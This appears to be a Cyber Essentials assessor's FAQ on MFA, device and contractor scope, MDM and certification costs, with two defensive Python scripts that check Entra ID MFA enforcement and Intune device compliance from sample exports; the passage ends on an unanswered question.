Yes, Defender for Endpoint runs on macOS and covers antivirus, firewall monitoring, and vulnerability scanning. Intune manages Macs alongside Windows PCs from the same admin portal. One console, one set of compliance reports, one set of evidence for your CE assessment. Often the simplest approach for mixed environments. Microsoft 365 Business Premium, which most businesses already have, includes Defender for Business (the small-business edition of Defender for Endpoint), and it supports macOS at no extra cost.
Keywords: Microsoft Defender, macOS, Intune, cross-platform, mixed environment | Confidence: 0.8
Our cloud service verifies email on first login but not after that. Is this MFA?
No, email verification at account setup is identity confirmation, not multi-factor authentication. MFA must occur at every login session (or at minimum when the service doesn't recognise the device). A one-time verification during signup doesn't protect the account after that point. You need an authenticator app, hardware key, or push notification challenge on every login. I see this confusion regularly during assessments.
Keywords: email verification, MFA, login, not compliant, authentication | Confidence: 0.85
What about services that verify email monthly or every 30 days?
That approach is not compliant under CE requirements. Authentication must happen at every login session, not on a schedule. If users log in multiple times that month without being challenged, the account is unprotected between verifications. Some services reduce friction by 'remembering' a specific device for up to 30 days, and that's fine as long as it remembers the exact device (browser plus computer combination), not just the account. Document your configuration clearly because I will test this by logging in multiple times during assessment.
Keywords: periodic verification, MFA frequency, remember device, compliance | Confidence: 0.8
Which MFA methods ARE compliant?
Authenticator apps (Microsoft Authenticator, Google Authenticator) are the strongest commonly used option. Hardware security keys (YubiKey, FIDO2 tokens) give the highest security and I recommend them for admin accounts. Biometrics like Windows Hello or Touch ID combined with a password work. Push notifications from authenticator apps also work well. SMS codes are acceptable as backup but shouldn't be your sole MFA factor because of SIM swap risks. Email codes are the weakest option: a code sent at every login, on top of the password, is a second factor you can fall back on when a service offers nothing better, but a one-off email check at signup or on a calendar schedule (see the two questions above) is not MFA at all. The test is simple: does the method use two different factor types (something you know plus something you have or are), and is it challenged at login?
Keywords: MFA methods, authenticator app, hardware key, FIDO2, biometrics, compliant | Confidence: 0.85
We restrict our cloud service to office IP only. Does this count as MFA?
No, IP restrictions are not MFA at all. Under Danzell v3.3, IP allowlisting is no longer an acceptable alternative to multi-factor authentication for cloud services. An IP address isn't 'something you have' because anyone on your office network shares it. You need actual MFA: authenticator app, hardware key, biometric, or push notification on top of the password. IP restrictions are a useful additional layer, but they don't replace MFA. I fail people on this particular issue regularly.
Keywords: IP restriction, IP allowlist, MFA, not compliant, Danzell, cloud services | Confidence: 0.9
What about VPN + MFA combination?
VPN MFA only protects VPN access and nothing beyond that. Cloud services accessed through that VPN connection still need their own MFA. Having MFA on the VPN doesn't satisfy the MFA requirement for Microsoft 365, Google Workspace, or other cloud services. Each cloud service needs MFA at the application level. VPN MFA protects the tunnel while cloud MFA protects the service, and those are two completely separate things.
Keywords: VPN, MFA, cloud services, layered security, authentication | Confidence: 0.85
Does Windows Hello for Business meet MFA requirements?
Yes, it combines something you are (biometric: face or fingerprint) or something you know (PIN) with something you have (the specific device, bound to the credential through TPM). Counts as passwordless under Danzell v3.3, which explicitly includes FIDO2 and similar methods. Important distinction: it must be Windows Hello for Business (managed by your organisation), not just Windows Hello (consumer version). The business version ties the credential to your Entra ID tenant.
Keywords: Windows Hello, passwordless, MFA, biometric, FIDO2, Danzell | Confidence: 0.9
Do admin accounts need MFA if regular accounts don't require it?
Under Danzell v3.3, MFA is mandatory for all cloud service accounts where available. That means both admin and standard accounts alike. The old distinction doesn't apply any more. But even if it did, admin accounts would be the priority because a compromised admin account gives an attacker full control of your environment. If you could only protect one type of account (which isn't the case under current rules), admin accounts every single time without question.
Keywords: admin accounts, MFA, mandatory, Danzell, priority | Confidence: 0.9
How do we handle admin accounts that can't support MFA?
If a cloud service genuinely doesn't offer MFA for admin accounts, document the technical limitation and your compensating controls. IP restrictions, strong unique passwords, enhanced monitoring. Contact the vendor in writing to request MFA support and keep that correspondence as evidence. Under Danzell v3.3, 'available' means the service provider offers it, not whether you've chosen to enable it. Cost is not a valid reason to claim MFA is unavailable.
Keywords: admin MFA, exceptions, compensating controls, documentation, unavailable | Confidence: 0.85
How do we define "available" for MFA?
If the service provider offers it as a feature, it counts as 'available' with no exceptions or ambiguity. It doesn't matter if it costs extra to enable. If the service supports MFA in any form (authenticator app, SMS, hardware key), you must enable it. The only valid exemption is if the provider genuinely doesn't offer any form of MFA. Cost, inconvenience and user complaints are not valid exemptions under the rules. Document the provider's MFA capabilities and your evidence that you've enabled them.
Keywords: MFA available, definition, Danzell, exemption, cost | Confidence: 0.9
What about legacy services with no MFA?
Document it as an exception with evidence: screenshots of the security settings showing no MFA option, or written confirmation from the vendor. Put compensating controls in place like strong unique passwords, IP restrictions if possible, enhanced monitoring. Then seriously ask whether that service should remain in use at all. A cloud service with no MFA capability in 2026 tells you something about its overall security posture.
Keywords: legacy services, no MFA, exceptions, compensating controls, cloud security | Confidence: 0.8
Can we argue cost makes MFA "unavailable"?
No, cost is not a valid reason under Danzell v3.3. If the service provider offers MFA, even as a paid add-on, you must enable it. Only exemption is genuine technical unavailability where the provider doesn't offer MFA at all. If the MFA tier is too expensive, that's a conversation about whether you should be using that service, not a CE exemption.
Keywords: MFA cost, unavailable, exemption, Danzell, compliance | Confidence: 0.9
How do we implement MFA for automated service accounts?
They can't respond to interactive MFA prompts. Use certificate-based authentication, platform-managed identities (managed identities in Azure, IAM roles in AWS), or API keys with restricted permissions that live in a secrets manager and get rotated. Document why interactive MFA isn't technically feasible for each service account, since the same principle applies: prevent unauthorised use. Managed identities and roles are strongest because the platform issues short-lived credentials and nothing is stored in code or config.
Keywords: service accounts, automated, MFA, API keys, managed identity, certificates | Confidence: 0.8
Do shared functional accounts need MFA?
Yes, the same MFA rules apply as any other account. The challenge is practical: whose phone gets the MFA prompt? Options include using a shared hardware token (YubiKey kept in a secure location), an authenticator app on a shared company device, or restructuring so each person has their own account with MFA and a shared mailbox is accessed through delegation rather than shared credentials. Individual accounts with delegation is the cleanest approach. I recommend that approach every single time during assessments.
Keywords: shared accounts, functional accounts, MFA, delegation, compliance | Confidence: 0.8
What about BYOD MFA token management?
Staff using personal phones as MFA tokens need a clear process for when they leave, change phones, or lose their device. Require backup MFA methods during enrollment: a second device, backup codes, or a hardware key. When someone leaves, disable their cloud accounts (which invalidates MFA regardless of what's on their phone). For phone changes, most authenticator apps support backup and restore, or you can re-enroll MFA on the new device.
Keywords: BYOD, MFA tokens, phone management, offboarding, backup codes | Confidence: 0.75
How often must users re-authenticate with MFA?
CE doesn't specify an exact re-authentication frequency. MFA must be enforced at login, and 'remember this device' for up to 30 days is acceptable as long as it remembers the specific device (browser and computer combination). For admin accounts, I'd recommend shorter session timeouts. Four hours maximum with MFA required on every new session. A stolen password alone can't access your cloud services. The exact timeout is a business decision within those bounds.
Keywords: MFA frequency, re-authentication, session timeout, remember device | Confidence: 0.8
What documentation do assessors need for MFA exceptions?
For any service where MFA isn't enabled, I need evidence of why. Screenshots showing the service doesn't offer MFA, or written confirmation from the vendor that MFA isn't available. I'll also want to see compensating controls: strong passwords, IP restrictions, enhanced monitoring. A spreadsheet listing every cloud service in scope with its MFA status (enabled, not available, or in progress) is the most efficient way to present this.
Keywords: MFA exceptions, documentation, assessor evidence, compensating controls | Confidence: 0.8
What MFA mistakes cause assessment failures?
The most common MFA failures I see: MFA configured but not enforced (it's optional and some users haven't enabled it). Cloud services excluded from scope to dodge the MFA requirement (not allowed under Danzell v3.3). IP restrictions claimed as MFA alternative (no longer accepted). Admin accounts without MFA while standard accounts have it. Social media accounts without MFA (yes, they're in scope now). Shared accounts where nobody can demonstrate the MFA flow. Check every cloud service, not just Microsoft 365.
Keywords: MFA failures, assessment failures, common mistakes, compliance gaps | Confidence: 0.9
What should we be ready to demonstrate live?
For CE Plus, I'll ask you to log into your primary cloud service and show the MFA challenge (authenticator app, push notification, or hardware key). Show the admin portal where MFA policy is configured and prove it's mandatory, not optional. Pull up the user account list and demonstrate that 100% have MFA enabled with no gaps. Log into an admin account and show MFA is enforced for elevated access too. I want to see MFA actually working, not just screenshots of configuration pages. Practice the login flow beforehand so you're not fumbling during the assessment.
Keywords: CE Plus demonstration, MFA live demo, assessment evidence, admin portal | Confidence: 0.85
How do we handle the complexity of mixed MFA environments?
Map every cloud service in scope, document which MFA method each supports, enable the strongest option. You don't need the same MFA method everywhere. Microsoft 365 might use Authenticator app, your CRM might use SMS, your accounting software might use email codes. Each service needs MFA enabled with whatever method it supports. Keep a simple spreadsheet: service name, MFA method, enrollment status. That becomes your assessment evidence and your ongoing compliance tracker.
Keywords: mixed MFA, multiple services, MFA methods, compliance tracking | Confidence: 0.8
How do we create an approved application list?
Start with essentials: email client, calendar, productivity apps (Office or Google), collaboration tools (Teams or Slack), and any industry-specific applications. Add your security apps: password manager and authenticator for MFA. Then decide what to block: file-sharing apps you don't use, games, and unapproved VPN apps. Keep it to 10-20 approved apps for most SMEs. Review quarterly and add legitimate requests as they come in. Start restrictive and add as needed, which is much easier than the other way round.
Keywords: approved apps, application allowlist, MDM, mobile security, policy | Confidence: 0.75
Do we need to configure special authentication for our Azure AD environment?
Your Entra ID environment needs MFA enforced via conditional access policies for all users and admins accessing cloud services. That's the main requirement for CE compliance. For CE Plus, I may need a scanning account with appropriate permissions, but I'll cover that during the pre-assessment call. You don't need to change your authentication architecture. Just ensure MFA is enforced, admin accounts are separated, and conditional access policies are properly configured.
Keywords: Azure AD, Entra ID, authentication, conditional access, MFA, CE Plus | Confidence: 0.8
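The two things the questions above ask you to prove for Entra ID, that a Conditional Access policy actually enforces MFA for everyone (not report-only, not optional) and that every user has a method registered so the policy can challenge them, can be checked from two Graph exports before the assessor does it live. The script below is an added example for this FAQ, not code from the page or from Microsoft. It reads policies in the shape returned by `GET /identity/conditionalAccess/policies` and the registration report from `GET /reports/authenticationMethods/userRegistrationDetails`; the JSON embedded here is constructed sample data with fake object IDs, trimmed to the fields the check uses.

```python
"""Check Entra ID MFA enforcement from exported Graph data (added example)."""
import json

# Constructed sample export of Conditional Access policies (fake IDs).
POLICIES_JSON = """
[
  {"displayName": "CE - MFA for all users", "state": "enabled",
   "conditions": {
     "users": {"includeUsers": ["All"],
               "excludeUsers": ["11111111-1111-1111-1111-111111111111"],
               "excludeGroups": ["22222222-2222-2222-2222-222222222222"]},
     "applications": {"includeApplications": ["All"], "excludeApplications": []}},
   "grantControls": {"operator": "OR", "builtInControls": ["mfa"]}},
  {"displayName": "CE - MFA for admins",
   "state": "enabledForReportingButNotEnforced",
   "conditions": {
     "users": {"includeUsers": [], "includeRoles": ["33333333-3333-3333-3333-333333333333"],
               "excludeUsers": [], "excludeGroups": []},
     "applications": {"includeApplications": ["All"], "excludeApplications": []}},
   "grantControls": {"operator": "OR", "builtInControls": ["mfa"]}}
]
"""

# Constructed sample of the user registration report. Note carol: an email
# address is registered (SSPR only), so Graph still reports isMfaRegistered false.
REGISTRATION_JSON = """
[
  {"userPrincipalName": "alice@example.com", "isAdmin": true,
   "isMfaRegistered": true, "methodsRegistered": ["microsoftAuthenticatorPush"]},
  {"userPrincipalName": "bob@example.com", "isAdmin": false,
   "isMfaRegistered": false, "methodsRegistered": []},
  {"userPrincipalName": "carol@example.com", "isAdmin": true,
   "isMfaRegistered": false, "methodsRegistered": ["email"]},
  {"userPrincipalName": "dave@example.com", "isAdmin": false,
   "isMfaRegistered": true, "methodsRegistered": ["softwareOneTimePasscode"]}
]
"""


def requires_mfa(policy):
    """True if the grant control demands MFA: the classic 'mfa' control or an authentication strength."""
    grant = policy.get("grantControls") or {}
    return "mfa" in grant.get("builtInControls", []) or bool(grant.get("authenticationStrength"))


def is_tenant_wide(policy):
    """True if the policy targets all users and all cloud apps."""
    users = policy["conditions"]["users"]
    apps = policy["conditions"]["applications"]
    return "All" in users.get("includeUsers", []) and "All" in apps.get("includeApplications", [])


def is_enforcing(policy):
    """Report-only ('enabledForReportingButNotEnforced') and disabled policies enforce nothing."""
    return policy["state"] == "enabled" and requires_mfa(policy) and is_tenant_wide(policy)


def assess(policies_json, registration_json):
    """Summarise what an assessor will look for: an enforced tenant-wide MFA policy,
    its exclusions (each needs a documented reason), and users who cannot be challenged
    because they have registered no MFA method. Admins are listed separately."""
    policies = json.loads(policies_json)
    details = json.loads(registration_json)
    enforced = [p for p in policies if is_enforcing(p)]
    exclusions = {}
    for p in enforced:
        u = p["conditions"]["users"]
        exclusions[p["displayName"]] = u.get("excludeUsers", []) + u.get("excludeGroups", [])
    unregistered = [d for d in details if not d["isMfaRegistered"]]
    admins = sorted(d["userPrincipalName"] for d in unregistered if d["isAdmin"])
    users = sorted(d["userPrincipalName"] for d in unregistered if not d["isAdmin"])
    return {
        "enforced_policies": [p["displayName"] for p in enforced],
        "exclusions": exclusions,
        "unregistered_admins": admins,
        "unregistered_users": users,
        "pass": bool(enforced) and not unregistered,
    }


if __name__ == "__main__":
    print(json.dumps(assess(POLICIES_JSON, REGISTRATION_JSON), indent=2))
```

On the sample data the tenant fails: the all-users policy is enforced, but the admin policy is report-only and two users (one of them an admin) have no MFA method registered, which is exactly the "configured but not enforced" failure described above. Every ID in the exclusions list is something you should be able to explain on the day (break-glass account, service account group).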
Can local admin accounts be used instead of domain authentication?
Local admin accounts can exist alongside domain or Entra ID accounts. CE requires admin accounts separated from daily-use accounts regardless of type. Nobody uses an admin account for email and browsing. Local, domain, Entra ID, doesn't matter for CE purposes. The separation principle is what counts: admin credentials only used when elevated access is needed.
Keywords: local admin, domain authentication, admin separation, Entra ID, access control | Confidence: 0.8
Devices & BYOD
Will assessor want to see every device?
No, I sample a representative selection across your device types. I'll pick a mix of Windows laptops, Macs, servers and mobiles to verify that what you declared in your CE Basic questionnaire matches reality. Sample needs to show firewalls enabled, malware protection running, patches applied within 14 days and proper access controls.
Keywords: device sampling, assessment, CE Plus, representative sample | Confidence: 0.95
What about mobile devices - do assessors check these?
Yes, any mobile device accessing your organisational data is in scope. I'll check they're running a supported OS, getting security updates within 14 days, using a lock screen, and if you've deployed MDM I'll verify that too. Most businesses pass easily with company iPhones or Android devices that have auto-updates enabled.
Keywords: mobile device, phone, tablet, assessment, MDM | Confidence: 0.95
What inventory mistakes cause re-assessments?
Most common inventory mistakes: missing cloud services staff have signed up to (personal Dropbox, forgotten SaaS tools), not listing all devices (home workers' laptops, mobile phones, tablets), and not including development or test environments. Any of these can trigger reassessment if I discover them during the screenshare. Under Danzell v3.3, BYOD devices that access organisational data are explicitly in scope, so check every personal phone that touches work email or files.
Keywords: inventory, asset discovery, scope, Danzell, BYOD | Confidence: 0.9
How do we avoid last-minute discoveries?
Run a full audit 2-4 weeks before. Check credit card statements for SaaS subscriptions, survey all departments about tools they use, check browser bookmarks on company devices and review Entra ID or Google Workspace sign-in logs for cloud services you didn't know about. I've seen businesses discover a forgotten CRM system during the screenshare. That's a bad time to find out.
Keywords: audit, discovery, preparation, cloud services, SaaS | Confidence: 0.9
What exactly counts as a "contractor" for Cyber Essentials?
Anyone accessing your in-scope systems or data counts, regardless of contract type. That includes freelancers, consultants, temps, managed service providers and agency staff. If they log into your systems, their devices must meet CE requirements: supported OS, 14-day patching, malware protection, MFA on cloud accounts and proper access controls. The test is always access to organisational data, not the person's job title.
Keywords: contractor, freelancer, consultant, scope, BYOD | Confidence: 0.92
Does my window cleaner's phone count if they use our Wi-Fi?
No, not if they're just using your Wi-Fi for personal internet access. The scope test is whether someone accesses your organisational data. A window cleaner browsing their own email on your guest Wi-Fi doesn't count. But if they've somehow got access to your company systems, shared drives or business email, their device is in scope.
Keywords: Wi-Fi, guest network, scope, organisational data | Confidence: 0.95
What's the easiest way to manage contractor devices?
Company-owned laptops are by far the simplest option. You control the security configuration, patches and malware protection, and you can easily demonstrate compliance during assessment. If that's not practical, use MDM software like Microsoft Intune or Google Workspace to enforce policies on their personal devices. The key is having evidence you can show me during assessment.
Keywords: contractor, device management, MDM, company laptop | Confidence: 0.92
How does Mobile Device Management (MDM) work for contractors?
MDM enforces CE security policies on contractor devices remotely. Once the contractor enrols their device, MDM can enforce passcodes, push security updates, require encryption, restrict which apps can access business data, and enable remote wipe if the device is lost. Main benefit for CE: proving contractor devices meet the same standards as your own. Use screenshots from the MDM console as your assessment evidence.
Keywords: MDM, contractor, Intune, device management, remote wipe | Confidence: 0.9
What about contractors who refuse MDM enrollment?
Don't give them access to your systems. CE requires all devices accessing organisational data to meet security standards, and without MDM you can't prove compliance. Alternatives: company laptop, managed virtual desktop, or limit access to non-sensitive systems you can exclude from scope.
Keywords: MDM, contractor, refusal, virtual desktop, scope exclusion | Confidence: 0.92
What about contractors needing admin access to our systems?
Separate named admin accounts that are auditable and revocable. Under CE, admin accounts must only be used for admin tasks, so the contractor's admin account should be distinct from their day-to-day user account. Enable MFA, set minimum privileges for their specific work, and disable the account the day the contract ends. I regularly see businesses fail because a contractor's admin account was left active months after they finished.
Keywords: contractor, admin access, privilege, MFA, account management | Confidence: 0.92
How often should I review contractor access?
Quarterly at minimum, and immediately when a contract ends. Same-day account disabling when a contractor finishes. Not 'when we get round to it.' Also check quarterly whether contractors still need the same level of access they were originally given. CE requires regular privilege reviews, and stale contractor accounts are one of the most common findings I flag during assessments.
Keywords: contractor, access review, account management, quarterly | Confidence: 0.9
Contractor says they're already "cyber secure" - is that enough?
That means nothing for your CE assessment at all. You're responsible for proving every device accessing your systems meets CE requirements, regardless of what they believe. Ask them for evidence: are their devices patched within 14 days? Is MFA enabled on their cloud accounts? Is their OS still supported and receiving patches? If they can't show you, treat them like any non-compliant device and either bring them up to standard or restrict their access.
Keywords: contractor, compliance evidence, verification, responsibility | Confidence: 0.92
Is it cheaper to exclude contractors entirely?
You can't exclude contractors who access your in-scope systems. That's not how scoping works under Danzell. If they touch your data, they're in scope. You can restructure to genuinely remove their access, but that's usually more expensive than managing their devices properly. Most businesses find a company laptop or MDM cheaper than completely redesigning contractor workflows.
Keywords: contractor, scope, exclusion, cost, MDM | Confidence: 0.9
What exactly does "application allowlisting" mean?
Only pre-approved apps can run on managed devices, and everything else is blocked by default. Opposite of blocklisting (blocking known bad apps). For CE, app stores on mobile devices provide this function because Apple and Google vet apps before listing them. On desktops, Windows Defender Application Control (now App Control for Business) is a true allowlist. macOS Gatekeeper is not quite the same thing: it refuses unsigned and un-notarised apps rather than restricting you to a named list, so a real macOS allowlist needs MDM or an endpoint tool on top of it.
Keywords: allowlisting, application control, Gatekeeper, app store | Confidence: 0.92
Are the mobile device requirements in Cyber Essentials new?
They've been in CE for several versions, but Danzell (v3.3, mandatory from April 2026) tightens things considerably. BYOD devices that access organisational data are now explicitly in scope, MFA is mandatory on all cloud service accounts where supported, and social media accounts used for business are included. If you've been treating phones as out of scope, that's over.
Keywords: Danzell, v3.3, mobile, BYOD, MFA, scope change | Confidence: 0.92
Are there free MDM solutions that work for Cyber Essentials?
Intune is included free with Microsoft 365 Business Premium, which most businesses already have. It manages iOS, Android and Windows devices, enforces passcodes, requires encryption and enables remote wipe. Google Workspace also includes basic mobile management at no extra cost. For most small businesses, one of these covers CE requirements without spending anything extra.
Keywords: free MDM, Intune, Google Workspace, mobile management | Confidence: 0.92
What's the difference between BYOD and company device management?
Company-owned devices give you full control: configuration, updates, installed apps, replacement schedule. BYOD saves on hardware but you're relying on MDM to enforce policies on someone else's phone. Under Danzell, personal devices accessing organisational data must meet the same CE requirements as company devices, so whichever approach you choose, the compliance bar is identical.
Keywords: BYOD, company device, Danzell, MDM, compliance | Confidence: 0.9
What mobile device mistakes cause assessment failures?
Most common mobile failures I see: no MDM evidence at all ('we have policies but nothing enforcing them'), outdated devices running unsupported OS versions, no MFA on cloud accounts accessed from phones, and personal devices with business email but no management. Under Danzell, if a phone accesses any organisational data it's in scope. 'We didn't think phones counted' won't pass.
Keywords: mobile failure, MDM, assessment, Danzell, MFA | Confidence: 0.95
Will EDR slow down my computers?
The performance impact is minimal on business-grade hardware. 1-3% CPU during normal operations, 5-10% during active scanning, 200-500MB RAM. Users typically can't tell it's running at all. Significant slowdowns usually point to a hardware problem, not EDR.
Keywords: EDR, performance, CPU, RAM, speed | Confidence: 0.9
Who Needs It
What format should policies be in?
Any professional format: PDF, Word document, intranet pages. CE doesn't mandate a specific format for policies. Policies need to clearly document your security requirements and be accessible to staff. Don't write 50-page documents nobody reads when one page per control area is far more effective.
Keywords: policy format, documentation, security policy | Confidence: 0.9
Should I have admin accounts logged in already?
No, and that's actually a CE requirement in itself. Admin accounts must only be used for administrative tasks. Keep them logged out and only sign in when you need to demonstrate something during assessment. I'll ask you to log in live.
Keywords: admin accounts, separation, logged in, assessment | Confidence: 0.95
How do I handle data residency requirements?
CE doesn't mandate data location, but you must comply with GDPR and any contractual data residency obligations. For cloud services, document where your data is hosted. Most providers specify region in their settings or terms. If a client contract requires UK-only data storage, verify your cloud provider's data centre locations and configure accordingly.
Keywords: data residency, GDPR, cloud storage, data centre location | Confidence: 0.85
What about healthcare and finance sector benefits?
Healthcare businesses often need CE Plus for NHS supply chain contracts (PPN requirements), and DSPT alignment means CE controls overlap with NHS data security standards. Financial services firms face FCA expectations around operational resilience (PS21/3), and DORA (applying from January 2025 in the EU) adds further ICT risk requirements. Both sectors get stronger insurance benefits because insurers rate their data risk highly.
Keywords: healthcare, NHS, finance, FCA, DORA, DSPT | Confidence: 0.85
Will insurance benefits increase over time?
That's likely to happen over time, yes. As more businesses certify, insurers have better claims data showing CE-certified businesses are lower risk, and the market is maturing rapidly. CE is increasingly a baseline expectation, not a bonus. Businesses with multi-year certification history and claims-free records tend to see improving terms at each renewal.
Keywords: insurance trends, benefits over time, market maturity | Confidence: 0.82
Is FileVault encryption required for Cyber Essentials?
Not strictly required for desktop Macs that stay in the office. But effectively required for any Mac that leaves the premises. If a Mac is stolen or lost without encryption, the data is exposed. I expect to see FileVault on portable Macs. Turning it on takes a few minutes; on Apple silicon and T2 Macs the data is already encrypted at rest so it is effectively immediate, and on older Intel Macs the encryption pass runs in the background while the Mac stays usable.
Keywords: FileVault, encryption, macOS, portable devices, required | Confidence: 0.88
Can we use Gatekeeper instead of MDM for application control?
Yes, Gatekeeper (enabled by default on macOS) blocks unsigned and un-notarised apps, which satisfies CE secure configuration requirements. Full MDM-based allowlisting is stronger but not required. For CE Plus, be ready to show me Gatekeeper enabled and set to 'App Store and identified developers' in System Settings, and that `spctl --status` in Terminal reports `assessments enabled`. If someone has run `spctl --master-disable` to get an unsigned tool working, that is what the command will reveal.
Keywords: Gatekeeper, MDM, application control, macOS, CE compliance | Confidence: 0.9
How much additional revenue can CE unlock?
CE qualifies you for government contracts handling personal data or ICT services (mandatory under PPN 09/14). Value depends entirely on which contracts you pursue. Defence supply chain contracts, NHS supplier agreements and central government tenders all increasingly require CE as minimum. I've seen businesses win single contracts worth more than ten years of certification fees.
Keywords: revenue, government contracts, PPN 09/14, defence, NHS | Confidence: 0.85
Do I need CE Plus for government contracts?
Most government contracts require CE Basic at minimum. CE Plus is increasingly expected for contracts handling sensitive data (personal data, classified information, health records), defence and MOD supply chain work, and NHS digital services. Some departments now mandate CE Plus even when the formal requirement is Basic. If you're regularly bidding for government work, get CE Plus.
Keywords: government contracts, CE Plus, MOD, NHS, defence | Confidence: 0.9
What about private sector contracts requiring CE?
The trend is growing steadily across all sectors. Large corporations (FTSE 100, major banks, defence primes like BAE Systems and Rolls-Royce) increasingly mandate CE from their entire supply chain. Insurance companies are starting to require it for coverage. Professional services firms face client expectations for CE as standard due diligence. Enterprise or regulated clients will expect CE questions.
Keywords: private sector, supply chain, FTSE 100, client requirements | Confidence: 0.85
What if I miss the October 2025 deadline?
Windows 10 passed end-of-life in October 2025 and devices still running it fail CE immediately because there are no security patches being released. Your CE certificate will lapse at renewal. Options: upgrade to Windows 11, replace incompatible hardware, purchase Extended Security Updates (ESU) as a temporary bridge, or move devices off-scope if they don't handle organisational data. Don't wait on this because hardware procurement takes 2-3 weeks minimum.
Keywords: Windows 10 EOL, October 2025, deadline, ESU, hardware replacement | Confidence: 0.9
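Before the assessor samples devices, run the same checks yourself over an MDM export: unsupported Windows 10 machines, devices that have not checked in for so long that you cannot evidence the 14-day patch window, and unencrypted devices. The script below is an added example for this FAQ, not code from the page or from Microsoft. It reads records in the shape of the Microsoft Graph `managedDevice` resource (`GET /deviceManagement/managedDevices`: `deviceName`, `operatingSystem`, `osVersion`, `lastSyncDateTime`, `isEncrypted`). Two facts it relies on: Windows 10 reached end of support on 14 October 2025, and build 22000 was the first Windows 11 build, so a Windows `osVersion` with a build number below 22000 is Windows 10. The 14-day stale-sync threshold and the ESU list are assumptions for the example, and the device list is constructed sample data.

```python
"""Flag devices that would fail a CE device sample from an Intune export (added example)."""
import json
from datetime import datetime, timedelta

FIRST_WINDOWS_11_BUILD = 22000          # fact: 10.0.22000 was the first Windows 11 release
STALE_AFTER = timedelta(days=14)        # assumption: mirrors the CE 14-day patch window

# Constructed sample export; lastSyncDateTime uses Graph's ISO-8601 'Z' form.
DEVICES_JSON = """
[
  {"deviceName": "LAPTOP-01", "operatingSystem": "Windows", "osVersion": "10.0.19045.5371",
   "lastSyncDateTime": "2026-01-10T08:15:00Z", "isEncrypted": true},
  {"deviceName": "LAPTOP-02", "operatingSystem": "Windows", "osVersion": "10.0.22631.4751",
   "lastSyncDateTime": "2026-01-11T17:02:00Z", "isEncrypted": true},
  {"deviceName": "LAPTOP-03", "operatingSystem": "Windows", "osVersion": "10.0.19045.5371",
   "lastSyncDateTime": "2026-01-11T09:40:00Z", "isEncrypted": true},
  {"deviceName": "MBP-04", "operatingSystem": "macOS", "osVersion": "15.2",
   "lastSyncDateTime": "2025-12-01T12:00:00Z", "isEncrypted": false},
  {"deviceName": "IPHONE-05", "operatingSystem": "iOS", "osVersion": "18.2",
   "lastSyncDateTime": "2026-01-12T07:30:00Z", "isEncrypted": true}
]
"""


def parse_graph_time(value):
    """Graph timestamps end in 'Z'; make them timezone-aware datetimes."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def windows_build(os_version):
    """Return the build number from a Windows osVersion like '10.0.19045.5371', or None."""
    parts = os_version.split(".")
    return int(parts[2]) if len(parts) >= 3 and parts[2].isdigit() else None


def assess_devices(devices_json, as_of, esu_devices=frozenset()):
    """Map device name -> list of findings. Devices with no findings are omitted.
    as_of is an ISO-8601 timestamp; esu_devices names Windows 10 machines with a
    paid Extended Security Updates enrolment you can evidence (assumed list)."""
    now = parse_graph_time(as_of)
    findings = {}
    for d in json.loads(devices_json):
        issues = []
        if d["operatingSystem"] == "Windows":
            build = windows_build(d["osVersion"])
            if build is not None and build < FIRST_WINDOWS_11_BUILD and d["deviceName"] not in esu_devices:
                issues.append("windows-10-unsupported")
        if now - parse_graph_time(d["lastSyncDateTime"]) > STALE_AFTER:
            issues.append("stale-sync")          # cannot evidence patch state from MDM
        if not d["isEncrypted"]:
            issues.append("not-encrypted")       # effectively required for anything portable
        if issues:
            findings[d["deviceName"]] = issues
    return findings


if __name__ == "__main__":
    print(json.dumps(assess_devices(DEVICES_JSON, "2026-01-12T09:00:00Z", {"LAPTOP-03"}), indent=2))
```

Run against the sample with LAPTOP-03 on the ESU list, it flags LAPTOP-01 (Windows 10, no ESU) and the MacBook (six weeks since last check-in, FileVault off) and passes the rest. Whatever it flags is what you fix or move out of scope before the screenshare, not during it.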
Why do I need EDR if I already have antivirus?
Traditional antivirus detects known malware signatures and nothing beyond that. EDR monitors behaviour patterns instead, catching things like a legitimate program suddenly encrypting files or a PowerShell script downloading something suspicious. EDR catches it even without a signature. For CE, standard antivirus meets the minimum malware protection requirement. EDR exceeds it and provides the evidence trail assessors like to see for CE Plus.
Keywords: EDR vs antivirus, behavioural detection, malware protection, CE Plus | Confidence: 0.9
Costs & Pricing
Is cloud migration cost-effective for CE compliance?
That's a commercial question rather than a CE question. Cloud can make CE compliance easier (centralised management, built-in MFA, automatic updates) but migration costs are separate from certification costs. Don't migrate specifically for CE because that's overkill. If you're already planning to move, cloud environments are generally simpler to certify because the controls are built into the platform.
Keywords: cloud migration, cost, compliance, business decision | Confidence: 0.85
How do we find all our cloud services?
Start with credit card statements for subscription charges and your IT asset register. Ask department heads what tools their teams use. Check browser bookmarks and saved passwords on company devices, and review Entra ID or Google Workspace sign-in logs. The biggest gap is always shadow IT, meaning services individual staff signed up to without telling IT.
Keywords: cloud discovery, shadow IT, SaaS, inventory | Confidence: 0.9
What services do businesses commonly miss?
Domain registrars (GoDaddy, 123 Reg), website hosting or CMS platforms (WordPress, Squarespace), backup services running in the background, HR or payroll systems, accounting software beyond the main package, project management tools (Trello, Monday.com, Asana), and social media accounts used for business. Under Danzell, if your marketing team logs into LinkedIn or Facebook for company posts, those accounts are in scope.
Keywords: commonly missed, shadow IT, SaaS, Danzell, social media | Confidence: 0.9
Is the investment in Cyber Essentials worth it?
If you have specific business drivers, yes. Clear yes: government contracts (CE is mandatory for handling personal data or ICT services), clients require it, you want cyber insurance at better rates, or you handle sensitive data. Less clear: micro-business with no contracts requiring it and no plans to grow. Even then, the security improvements from implementing the five controls are worth the £320-2,000 investment.
Keywords: worth it, investment, business drivers, government contracts | Confidence: 0.88
What's the typical ROI for Cyber Essentials certification?
100-300% when you have clear business drivers (government contracts, insurance savings, client requirements). Can be negative if you're certifying without a specific reason. For a typical SME spending £1,200-2,000 on CE Plus: insurance savings (10-25% on a £3,000-10,000 policy = £300-2,500/year), contract access (one government tender won pays for years of certification), and avoided breach costs. The maths on this is straightforward when you lay it out.
Keywords: ROI, return on investment, business case, insurance savings | Confidence: 0.85
How quickly does Cyber Essentials pay for itself?
Typically pays for itself within 6-12 months through insurance savings alone. For example: CE Plus costs £1,200-2,000 and a cyber insurance premium reduction of 15% on a £5,000 policy saves £750/year. Win one government contract and the certification cost is irrelevant. I see this constantly during conversations with new clients. Businesses that don't see quick payback usually certified 'because someone told us to' without specific commercial drivers.
Keywords: payback period, ROI, insurance savings, contract access | Confidence: 0.85
How do I present ROI to finance teams?
